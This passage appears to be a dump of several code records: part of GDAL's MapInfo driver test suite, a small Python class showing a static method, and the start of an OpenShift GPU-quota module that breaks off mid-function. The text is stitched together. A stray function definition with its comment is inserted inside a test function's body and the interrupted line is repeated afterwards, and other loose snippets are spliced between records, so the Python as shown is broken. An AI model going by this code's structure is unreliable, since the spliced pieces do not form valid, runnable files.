creating an indexed field\n\n\ndef test_ogr_mitab_tab_field_index_creation(tmp_vsimem):\n\n layername = \"ogr_mitab_tab_field_index_creation\"\n filename = tmp_vsimem / f\"{layername}.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(layername)\n lyr.CreateField(ogr.FieldDefn(\"id\", ogr.OFTInteger))\n lyr.CreateField(ogr.FieldDefn(\"other_field\", ogr.OFTInteger))\n with gdal.quiet_errors():\n ds.ExecuteSQL(\"CREATE INDEX ON foo USING id\")\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING foo\")\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING id\")\n 
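\n\n###############################################################################\n# The driver-specific SQL exercised below, in its minimal form: creating an\n# index materializes a .ind companion file next to the .tab, which attribute\n# filters such as SetAttributeFilter("id = 200") can then use. The names are\n# placeholders.\n\n\ndef create_field_index(ds, layer_name, field_name):\n    # MapInfo-driver SQL dialect, as exercised by the test below\n    ds.ExecuteSQL("CREATE INDEX ON " + layer_name + " USING " + field_name)\n\n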
ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING id\")\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(0, 100)\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetField(0, 200)\n lyr.CreateFeature(f)\n ds = None\n\n assert gdal.VSIStatL(tmp_vsimem / f\"{layername}.ind\") is not None, \"no ind file\"\n\n ds = ogr.Open(filename)\n with gdal.quiet_errors():\n ds.ExecuteSQL(\"CREATE INDEX ON \" + layername + \" USING other_field\")\n lyr = ds.GetLayer(0)\n lyr.SetAttributeFilter(\"id = 200\")\n assert lyr.GetFeatureCount() == 1, \"bad feature count\"\n ds = None\n\n\n###############################################################################\n# Test reading a tab_view file\n\n\ndef test_ogr_mitab_tab_view():\n\n ds = ogr.Open(\"data/mitab/view_first_table_second_table.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetLayerDefn().GetFieldCount() == 2, \"bad field count\"\n f = lyr.GetNextFeature()\n if f[\"ID\"] != 100 or f[\"foo\"] != \"foo\":\n f.DumpReadable()\n pytest.fail(\"bad feature\")\n ds = None\n\n ds = ogr.Open(\"data/mitab/view_select_all_first_table_second_table.tab\")\n lyr = ds.GetLayer(0)\n assert lyr.GetLayerDefn().GetFieldCount() == 3, \"bad field count\"\n f = lyr.GetNextFeature()\n if f[\"joint_field\"] != 1 or f[\"ID\"] != 100 or f[\"foo\"] != \"foo\":\n f.DumpReadable()\n pytest.fail(\"bad feature\")\n ds = None\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_style(tmp_vsimem):\n\n tmpfile = tmp_vsimem / \"ogr_mitab_style.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmpfile)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"id\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POLYGON((0 0,0 1,1 1,0 0))\"))\n f.SetStyleString(\"BRUSH(fc:#AABBCC,bc:#DDEEFF);PEN(c:#DDEEFF)\")\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POLYGON((0 0,0 1,1 1,0 0))\"))\n f.SetStyleString('BRUSH(fc:#AABBCC,id:\"mapinfo-brush-1\")')\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POLYGON((0 0,0 1,1 1,0 0))\"))\n f.SetStyleString(\"BRUSH(fc:#AABBCC00,bc:#ddeeff00)\")\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(tmpfile)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n if (\n f.GetStyleString()\n != 'BRUSH(fc:#aabbcc,bc:#ddeeff,id:\"mapinfo-brush-2,ogr-brush-0\");PEN(w:1px,c:#ddeeff,id:\"mapinfo-pen-2,ogr-pen-0\",cap:r,j:r)'\n ):\n f.DumpReadable()\n pytest.fail()\n f = lyr.GetNextFeature()\n if (\n f.GetStyleString()\n != 'BRUSH(fc:#aabbcc,id:\"mapinfo-brush-1,ogr-brush-1\");PEN(w:1px,c:#000000,id:\"mapinfo-pen-2,ogr-pen-0\",cap:r,j:r)'\n ):\n f.DumpReadable()\n pytest.fail()\n f = lyr.GetNextFeature()\n if (\n f.GetStyleString()\n != 'BRUSH(fc:#aabbcc,id:\"mapinfo-brush-1,ogr-brush-1\");PEN(w:1px,c:#000000,id:\"mapinfo-pen-2,ogr-pen-0\",cap:r,j:r)'\n ):\n f.DumpReadable()\n pytest.fail()\n ds = None\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_tab_write_field_name_with_dot(tmp_vsimem):\n\n tmpfile = tmp_vsimem / \"ogr_mitab_tab_write_field_name_with_dot.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(tmpfile)\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"with.dot\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"with.dot\"] = 1\n 
f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(2 3)\"))\n lyr.CreateFeature(f)\n with gdal.quiet_errors():\n ds = None\n\n ds = ogr.Open(tmpfile)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"with_dot\"] == 1\n ds = None\n\n\n###############################################################################\n# Test read text labels with local encoding from mif/mid file\n\n\n@pytest.mark.parametrize(\n \"fname,expectedStyle\",\n (\n (\n \"win1251_text.mif\",\n 'LABEL(t:\"Поле\",a:0.000000,s:2.070000g,c:#ff0000,p:2,f:\"DejaVu Serif\")',\n ),\n (\n \"tab-win1251_text.tab\",\n 'LABEL(t:\"Поле\",a:0.000000,s:0.015375g,c:#000000,p:1,f:\"Times New Roman\")',\n ),\n ),\n ids=lambda x: x[0],\n)\ndef test_ogr_mitab_local_encoding_label(fname, expectedStyle):\n\n dsName = os.path.join(\"data/mitab\", fname)\n\n ds = ogr.Open(dsName)\n assert ds is not None, \"Can't open dataset: \" + dsName\n\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + dsName\n\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n feat = lyr.GetNextFeature()\n assert lyr is not None, \"Can't find text feature in\" + dsName\n\n assert feat.GetStyleString() == expectedStyle, (\n feat.GetStyleString(),\n expectedStyle,\n )\n\n\n###############################################################################\n# Check fix for https://github.com/OSGeo/gdal/issues/1232\n\n\ndef test_ogr_mitab_delete_feature_no_geometry(tmp_vsimem):\n\n filename = tmp_vsimem / \"test.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", geom_type=ogr.wkbNone)\n lyr.CreateField(ogr.FieldDefn(\"id\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"id\"] = 1\n lyr.CreateFeature(f)\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"id\"] = 2\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(filename, update=1)\n lyr = ds.GetLayer(0)\n assert lyr.DeleteFeature(1) == 0\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"id\"] == 2\n ds = None\n\n\n###############################################################################\n# Check fix for https://github.com/OSGeo/gdal/issues/1636\n\n\ndef test_ogr_mitab_too_large_value_for_decimal_field(tmp_vsimem):\n\n filename = tmp_vsimem / \"test.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", geom_type=ogr.wkbNone)\n fld = ogr.FieldDefn(\"f\", ogr.OFTReal)\n fld.SetWidth(20)\n fld.SetPrecision(12)\n lyr.CreateField(fld)\n\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"f\"] = 1234567.012\n assert lyr.CreateFeature(f) == ogr.OGRERR_NONE\n f = None\n\n f = ogr.Feature(lyr.GetLayerDefn())\n f[\"f\"] = 123456789.012\n with gdal.quiet_errors():\n assert lyr.CreateFeature(f) != ogr.OGRERR_NONE\n f = None\n\n ds = None\n\n\n###############################################################################\n# Check custom datum/spheroid parameters export\n\n\ndef test_ogr_mitab_custom_datum_export():\n\n sr = osr.SpatialReference()\n sr.SetGeogCS(\"Custom\", \"Custom\", \"Sphere\", 6370997.0, 0.0)\n sr.SetTOWGS84(1, 2, 3, 4, 5, 6, 7)\n proj = sr.ExportToMICoordSys()\n assert proj == \"Earth Projection 1, 9999, 12, 1, 2, 3, -4, -5, -6, 7, 0\"\n\n sr = osr.SpatialReference()\n sr.ImportFromMICoordSys(proj)\n assert sr.GetTOWGS84() == (\n 1,\n 2,\n 3,\n 4,\n 5,\n 6,\n 7,\n ), \"Wrong ExportToMICoordSys / ImportFromMICoordSys pair\"\n\n sr = 
osr.SpatialReference()\n sr.SetGeogCS(\"Custom\", \"Custom\", \"NWL-9D or WGS-66\", 6378145.0, 298.25)\n sr.SetTOWGS84(1, 2, 3, 4, 5, 6, 7)\n sr.SetUTM(33)\n proj = sr.ExportToMICoordSys()\n assert (\n proj\n == 'Earth Projection 8, 9999, 42, 1, 2, 3, -4, -5, -6, 7, 0, \"m\", 15, 0, 0.9996, 500000, 0'\n )\n\n\n###############################################################################\n# Check write/read description\n\n\ndef test_ogr_mitab_description(tmp_vsimem):\n filename = tmp_vsimem / \"test_description.tab\"\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n assert ds is not None, \"Can't create dataset: \" + filename\n\n test_description = 'Состав данных: Топокарты (растр) 1:50К, 100К, 250К, 500К, Топокарты (вектор) 1:100К, 1:250К, ЦМР 10м, Реестр географических названий 1:100000, АТД 1:10000, лидарная съемка, ортофото. Лицензия: на геоданные - ограничительная, не соответствующая определению \"открытых данных\", так как запрещено распространение данных.'\n\n lyr = ds.CreateLayer(\n \"test_description\",\n options=[\"ENCODING=CP1251\", \"DESCRIPTION={}\".format(test_description)],\n )\n assert lyr is not None, 'Can\\'t create layer \"test_description\"'\n if lyr.TestCapability(ogr.OLCStringsAsUTF8) != 1:\n pytest.skip(\"skipping test: recode is not possible\")\n\n lyr.CreateField(ogr.FieldDefn(\"feature_id\", ogr.OFTInteger))\n lyr.CreateField(ogr.FieldDefn(\"other_field\", ogr.OFTInteger))\n\n # Check description truncate.\n check_text = 'Состав данных: Топокарты (растр) 1:50К, 100К, 250К, 500К, Топокарты (вектор) 1:100К, 1:250К, ЦМР 10м, Реестр географических названий 1:100000, АТД 1:10000, лидарная съемка, ортофото. Лицензия: на геоданные - ограничительная, не соответствующая определению \"открытых данных\", так как запрещено распростр'\n assert check_text == lyr.GetMetadataItem(\"DESCRIPTION\")\n ds = None\n\n # Check storing description in tab file.\n ds = ogr.Open(filename, update=1)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n assert check_text == lyr.GetMetadataItem(\"DESCRIPTION\")\n\n # Check update description in tab file.\n check_short_text = \"Состав данных: Топокарты (растр) 1:50К, 100К, 250К, 500К\"\n lyr.SetMetadataItem(\"DESCRIPTION\", check_short_text)\n ds = None\n\n ds = ogr.Open(filename)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n assert check_short_text == lyr.GetMetadataItem(\"DESCRIPTION\")\n ds = None\n\n # Check line breaks and double quotes\n test_description = (\n 'Состав данных: \"Топокарты (растр)\"\\n1:50К,\\n100К,\\n250К,\\n500К\\r\\n\"new line\"'\n )\n check_description = (\n 'Состав данных: \"Топокарты (растр)\" 1:50К, 100К, 250К, 500К \"new line\"'\n )\n\n ds = ogr.Open(filename, update=1)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n lyr.SetMetadataItem(\"DESCRIPTION\", test_description)\n ds = None\n\n ds = ogr.Open(filename)\n assert ds is not None, \"Can't open dataset: \" + filename\n lyr = ds.GetLayer(0)\n assert lyr is not None, \"Can't get layer 0 from \" + filename\n assert check_description == lyr.GetMetadataItem(\"DESCRIPTION\")\n ds = None\n\n\n###############################################################################\n# Test writing and reading back unset/null date, time, datetime\n\n\ndef 
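# A minimal sketch of the export/re-import round trip the datum and SRS
# tests above are built on, shown here with WKT and EPSG:4326 as neutral,
# illustrative choices: re-import the exported CRS and compare with
# IsSame() rather than comparing strings character by character.
from osgeo import osr

src = osr.SpatialReference()
src.ImportFromEPSG(4326)
back = osr.SpatialReference()
back.ImportFromWkt(src.ExportToWkt())
assert back.IsSame(src) != 0  # IsSame() returns non-zero for equivalent CRS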
test_ogr_mitab_nulldatetime(tmp_vsimem):\n\n filename = tmp_vsimem / \"nulldatetime.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"nulldatetime\")\n lyr.CreateField(ogr.FieldDefn(\"time\", ogr.OFTTime))\n lyr.CreateField(ogr.FieldDefn(\"date\", ogr.OFTDate))\n lyr.CreateField(ogr.FieldDefn(\"datetime\", ogr.OFTDateTime))\n f = ogr.Feature(lyr.GetLayerDefn())\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert not f.IsFieldSet(\"time\")\n assert not f.IsFieldSet(\"date\")\n assert not f.IsFieldSet(\"datetime\")\n ds = None\n\n\n###############################################################################\n# Test reading .mid files where a field has a newline character\n\n\ndef test_ogr_mitab_read_multi_line_mid():\n\n ds = ogr.Open(\"data/mitab/multilinemid.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"Name\"] == \"NAME1\"\n assert f[\"Notes\"] == \"MULTI\\n\\nLINE\"\n assert f[\"Awesome\"] == \"F\"\n f = lyr.GetNextFeature()\n assert f[\"Name\"] == \"NAME2\"\n assert f[\"Notes\"] == \"MULTI\\nLINE2\"\n assert f[\"Awesome\"] == \"F\"\n\n\n###############################################################################\n# Test reading a .mid file with a single field, and an empty line for a record\n\n\ndef test_ogr_mitab_read_single_field_mid():\n\n ds = ogr.Open(\"data/mitab/single_field.mif\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"foo\"] == \"1\"\n f = lyr.GetNextFeature()\n assert f[\"foo\"] == \"\"\n f = lyr.GetNextFeature()\n assert f[\"foo\"] == \"3\"\n\n\n###############################################################################\n# Test reading a .mif/.tab with all data types\n\n\n@pytest.mark.parametrize(\"ext\", [\"mif\", \"tab\"])\ndef test_ogr_mitab_read_write_all_data_types(tmp_vsimem, ext):\n\n ds = ogr.Open(\"data/mitab/all_possible_fields.\" + ext)\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert f[\"field1\"] == \"test\"\n assert f[\"Field2\"] == 120\n assert f[\"Field3\"] == 12345\n assert (\n lyr.GetLayerDefn()\n .GetFieldDefn(lyr.GetLayerDefn().GetFieldIndex(\"Field4\"))\n .GetType()\n == ogr.OFTInteger64\n )\n assert f[\"Field4\"] == 123456789012345\n assert f[\"Field5\"] == 12.34\n assert f[\"Field6\"] == 12.34\n assert f[\"Field7\"] == \"2022/12/31\"\n assert f[\"Field8\"] == \"23:59:00\"\n assert f[\"Field9\"] == \"2022/03/23 14:56:00\"\n assert f[\"Field10\"] == \"T\"\n\n filename = tmp_vsimem / f\"test_ogr_mitab_read_write_all_data_types.{ext}\"\n out_ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n out_lyr = out_ds.CreateLayer(\"test\", geom_type=ogr.wkbNone)\n for i in range(lyr.GetLayerDefn().GetFieldCount()):\n out_lyr.CreateField(lyr.GetLayerDefn().GetFieldDefn(i))\n out_f = ogr.Feature(out_lyr.GetLayerDefn())\n out_f.SetFrom(f)\n assert out_lyr.CreateFeature(out_f) == ogr.OGRERR_NONE\n out_f = None\n out_ds = None\n\n\n###############################################################################\n\n\ndef _test_srs(workdir, srs, input_srs=None, ext=\"tab\"):\n \"\"\"srs = srs used for writing (unless input_srs is defined) and comparing\n output\"\"\"\n\n filename = workdir / f\"test_srs.{ext}\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n assert srs\n if isinstance(srs, str):\n tmp = osr.SpatialReference()\n tmp.SetFromUserInput(srs)\n srs = tmp\n if input_srs and isinstance(input_srs, str):\n tmp = 
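# The per-extension tests above use the standard pytest parametrisation
# idiom, sketched standalone here; tmp_path and the file name are
# illustrative, not taken from the suite.
import pytest

@pytest.mark.parametrize("ext", ["mif", "tab"])
def test_roundtrip_per_extension(tmp_path, ext):
    filename = tmp_path / f"test.{ext}"
    assert filename.suffix == f".{ext}"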
osr.SpatialReference()\n tmp.SetFromUserInput(input_srs)\n input_srs = tmp\n lyr = ds.CreateLayer(\n \"test\", srs=(input_srs if input_srs else srs), geom_type=ogr.wkbPoint\n )\n lyr.CreateField(ogr.FieldDefn(\"foo\"))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(ogr.CreateGeometryFromWkt(\"POINT(0 0)\"))\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n got_srs = lyr.GetSpatialRef()\n assert got_srs.IsSame(srs), got_srs.ExportToWkt()\n ds = None\n\n ogr.GetDriverByName(\"MapInfo File\").DeleteDataSource(filename)\n\n\n###############################################################################\n\n\n@pytest.mark.parametrize(\"ext\", [\"tab\", \"mif\"])\ndef test_ogr_mitab_write_etrs89_from_crs_epsg_code(tmp_vsimem, ext):\n\n _test_srs(tmp_vsimem, \"EPSG:25832\", ext=ext)\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_crs_wkt1(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(25832)\n srs.ImportFromWkt(srs.ExportToWkt([\"FORMAT=WKT1\"]))\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_crs_wkt2(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromEPSG(25832)\n srs.ImportFromWkt(srs.ExportToWkt([\"FORMAT=WKT2\"]))\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_custom_wkt_geogcs_code(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromWkt(\n \"\"\"PROJCS[\"ETRS89 / UTM zone 32N\",\n GEOGCS[\"ETRS89\",\n DATUM[\"European_Terrestrial_Reference_System_1989\",\n SPHEROID[\"GRS 1980\",6378137,298.257222101,\n AUTHORITY[\"EPSG\",\"7019\"]]],\n PRIMEM[\"Greenwich\",0,\n AUTHORITY[\"EPSG\",\"8901\"]],\n UNIT[\"degree\",0.0174532925199433,\n AUTHORITY[\"EPSG\",\"9122\"]],\n AUTHORITY[\"EPSG\",\"4258\"]],\n PROJECTION[\"Transverse_Mercator\"],\n PARAMETER[\"latitude_of_origin\",0],\n PARAMETER[\"central_meridian\",9],\n PARAMETER[\"scale_factor\",0.9996],\n PARAMETER[\"false_easting\",500000],\n PARAMETER[\"false_northing\",0],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n AXIS[\"Easting\",EAST],\n AXIS[\"Northing\",NORTH]]\"\"\"\n )\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_etrs89_from_custom_wkt_no_geogcs_code(tmp_vsimem):\n\n srs = osr.SpatialReference()\n srs.ImportFromWkt(\n \"\"\"PROJCS[\"ETRS89 / UTM zone 32N\",\n GEOGCS[\"ETRS89\",\n DATUM[\"European_Terrestrial_Reference_System_1989\",\n SPHEROID[\"GRS 1980\",6378137,298.257222101,\n AUTHORITY[\"EPSG\",\"7019\"]],\n AUTHORITY[\"EPSG\",\"6258\"]],\n PRIMEM[\"Greenwich\",0,\n AUTHORITY[\"EPSG\",\"8901\"]],\n UNIT[\"degree\",0.0174532925199433,\n AUTHORITY[\"EPSG\",\"9122\"]]],\n PROJECTION[\"Transverse_Mercator\"],\n PARAMETER[\"latitude_of_origin\",0],\n PARAMETER[\"central_meridian\",9],\n PARAMETER[\"scale_factor\",0.9996],\n PARAMETER[\"false_easting\",500000],\n PARAMETER[\"false_northing\",0],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n AXIS[\"Easting\",EAST],\n AXIS[\"Northing\",NORTH]]\"\"\"\n )\n _test_srs(tmp_vsimem, srs, \"EPSG:25832\")\n\n\n###############################################################################\n# Test writing point with LABEL style string\n\n\ndef 
test_ogr_mitab_point_label(tmp_vsimem):\n\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(\n tmp_vsimem / \"test_ogr_mitab_point_label.tab\"\n )\n lyr = ds.CreateLayer(\"test\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1 2)\"))\n f.SetStyleString(\n 'LABEL(t:\"my text\",a:2,s:1.5g,c:#123456,b:#234567,o:#234567,bo:1,it:1,un:1,p:2,f:\"My Font\")'\n )\n lyr.CreateFeature(f)\n ds = None\n\n ds = ogr.Open(tmp_vsimem / \"test_ogr_mitab_point_label.tab\")\n lyr = ds.GetLayer(0)\n f = lyr.GetNextFeature()\n assert (\n f.GetStyleString()\n == 'LABEL(t:\"my text\",a:2.000000,s:1.490400g,c:#123456,b:#234567,o:#234567,bo:1,it:1,un:1,p:2,f:\"My Font\")'\n )\n assert f.GetGeometryRef().GetX(0) == pytest.approx(1, 1e-2)\n assert f.GetGeometryRef().GetY(0) == pytest.approx(2, 1e-2)\n ds = None\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_write_epsg_3125_philippine_reference_system_1992(tmp_vsimem):\n\n _test_srs(tmp_vsimem, \"EPSG:3125\")\n\n\n###############################################################################\n\n\ndef test_ogr_mitab_read_read_extended_transverse_mercator():\n\n ds = ogr.Open(\"data/mitab/proj_34.mif\")\n lyr = ds.GetLayer(0)\n ref_srs = lyr.GetSpatialRef()\n assert ref_srs.ExportToProj4() == \"+proj=utm +zone=1 +datum=WGS84 +units=m +no_defs\"\n ds = None\n\n\n###############################################################################\n\n\n@pytest.mark.parametrize(\"ext\", [\"mif\", \"tab\"])\ndef test_ogr_mitab_read_write_hotine_oblique_mercator_with_rectified_grid_angle(\n tmp_vsimem, ext\n):\n\n ds = ogr.Open(\"data/mitab/proj_35.mif\")\n lyr = ds.GetLayer(0)\n ref_srs = lyr.GetSpatialRef()\n assert (\n ref_srs.ExportToProj4()\n == \"+proj=omerc +no_uoff +lat_0=4 +lonc=102.25 +alpha=323.025796466667 +gamma=323.130102361111 +k=0.99984 +x_0=804671 +y_0=123456 +ellps=evrst69 +units=m +no_defs\"\n )\n ds = None\n\n filename = (\n tmp_vsimem\n / f\"test_ogr_mitab_read_write_hotine_oblique_mercator_with_rectified_grid_angle.{ext}\"\n )\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"test\", srs=ref_srs, geom_type=ogr.wkbPoint)\n lyr.CreateField(ogr.FieldDefn(\"foo\"))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometry(ogr.CreateGeometryFromWkt(\"POINT(0 0)\"))\n lyr.CreateFeature(f)\n f = None\n ds = None\n\n ds = ogr.Open(filename)\n lyr = ds.GetLayer(0)\n got_srs = lyr.GetSpatialRef()\n assert got_srs.ExportToProj4() == ref_srs.ExportToProj4()\n ds = None\n\n\n###############################################################################\n# Test LABEL without text\n\n\ndef test_ogr_mitab_label_without_text(tmp_vsimem):\n\n filename = tmp_vsimem / \"test_ogr_mitab_label_without_text.tab\"\n ds = ogr.GetDriverByName(\"MapInfo File\").CreateDataSource(filename)\n lyr = ds.CreateLayer(\"label\")\n lyr.CreateField(ogr.FieldDefn(\"ID\", ogr.OFTInteger))\n f = ogr.Feature(lyr.GetLayerDefn())\n f.SetGeometryDirectly(ogr.CreateGeometryFromWkt(\"POINT(1 2)\"))\n f.SetStyleString(\"LABEL(f:DejaVu Sans,s:0.705557,c:#FF0000FF,b:#000000FF)\")\n lyr.CreateFeature(f)\n ds = None\n\n\n###############################################################################\n# Test fix for https://github.com/OSGeo/gdal/issues/7715\n\n\n@pytest.mark.parametrize(\"ext\", [\"tab\", \"mif\"])\ndef test_ogr_mitab_write_LCC_2SP_non_metre_unit(tmp_vsimem, ext):\n\n 
_test_srs(tmp_vsimem, \"EPSG:2277\", ext=ext) # \"NAD83 / Texas Central (ftUS)\"\n","repo_name":"OSGeo/gdal","sub_path":"autotest/ogr/ogr_mitab.py","file_name":"ogr_mitab.py","file_ext":"py","file_size_in_byte":95633,"program_lang":"python","lang":"en","doc_type":"code","stars":4154,"dataset":"github-code","pt":"19"} +{"seq_id":"1403973318","text":"from unicodedata import name\r\n\r\n\r\nclass student:\r\n def __init__(self,name,age):\r\n self.name=name\r\n self.age=age\r\n\r\n def PrintDetails(self):\r\n print(\"Name :\", self.name,\"Age:\",self.age)\r\n @staticmethod\r\n def welcome():\r\n print(\"Welcome to our Institutions\")\r\n\r\nT1= student(\"Chan\",24)\r\nT1.PrintDetails()\r\nT1.welcome()\r\n\r\nT2= student(\"selvi\", 37)\r\nT2.PrintDetails()\r\nT2.welcome()","repo_name":"zBalachandar/My-Basic-s-in-python_2022py","sub_path":"@static method in class.py","file_name":"@static method in class.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"1840412199","text":"import csv\nimport datetime\nimport os\nimport pathlib\n\nfrom api.config import settings\nfrom api.gpus import GpuBooking\nfrom api.notifications import post_msg_to_slack, send_email\nfrom api.users import User\nfrom api.utils import log, oc_login\nfrom fastapi.encoders import jsonable_encoder\nfrom sqlmodel import Session, SQLModel, create_engine, select\n\n\n\ndef disable_gpu(project_id, app_id, dyn_client) -> str:\n logs = ''\n\n try:\n # Turn down the DeploymentConfig to 0 replicas\n dyn_dc = dyn_client.resources.get(api_version=settings.CLUSTER_API_VERSION, kind='DeploymentConfig')\n body = {\n 'kind': 'DeploymentConfig',\n 'apiVersion': settings.CLUSTER_API_VERSION,\n 'metadata': {'name': app_id},\n 'spec': {\n 'replicas': 0,\n }\n }\n dyn_dc.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU pod *{app_id}* in *{project_id}* stopped\\n'\n\n except Exception as err:\n logs = logs + f'⚠️ Error stopping the workspace *{app_id}* in *{project_id}*: {str(err)[:21]}\\n'\n\n try:\n # Patch DeploymentConfig GPU limits\n dyn_dc = dyn_client.resources.get(api_version=settings.CLUSTER_API_VERSION, kind='DeploymentConfig')\n body = {\n 'kind': 'DeploymentConfig',\n 'apiVersion': settings.CLUSTER_API_VERSION,\n 'metadata': {'name': app_id},\n 'spec': {\n 'template': {\n 'spec': {\n 'containers': [\n {\n \"name\": app_id,\n \"resources\": {}\n }\n ]\n }\n }\n }\n }\n dyn_dc.patch(body=body, namespace=project_id)\n logs = logs + f'✅ GPU limits disabled for the pod *{app_id}* in *{project_id}\\n'\n\n except Exception as err:\n logs = logs + f'⚠️ Error disabling GPU limits for the pod *{app_id}* in *{project_id}*: {str(err)[:21]}\\n'\n\n # Patch ResourceQuota for GPU\n try:\n dyn_quota = dyn_client.resources.get(api_version='v1', kind='ResourceQuota')\n body = {\n 'kind': 'ResourceQuota',\n 'apiVersion': 'v1',\n 'metadata': {'name': 'gpu-quota'},\n \"spec\": {\n \"hard\": { \"requests.nvidia.com/gpu\": 0 }\n }\n }\n dyn_quota.patch(body=body, namespace=project_id)\n logs = logs + f'🧊 GPU quota of {project_id} set to 0'\n log.info(logs)\n\n except Exception as err:\n logs = logs + f'❌ Could not set the GPU quota to 0 in *{project_id}*. 
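# The `student` class in the record above demonstrates @staticmethod; the
# essential behaviour, reduced to a sketch, is that a static method receives
# neither `self` nor `cls`, so it can be called on the class itself as well
# as through an instance.
class Student:
    def __init__(self, name):
        self.name = name

    @staticmethod
    def welcome():
        print("Welcome to our institution")

Student.welcome()          # no instance required
Student("Chan").welcome()  # also reachable through an instance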
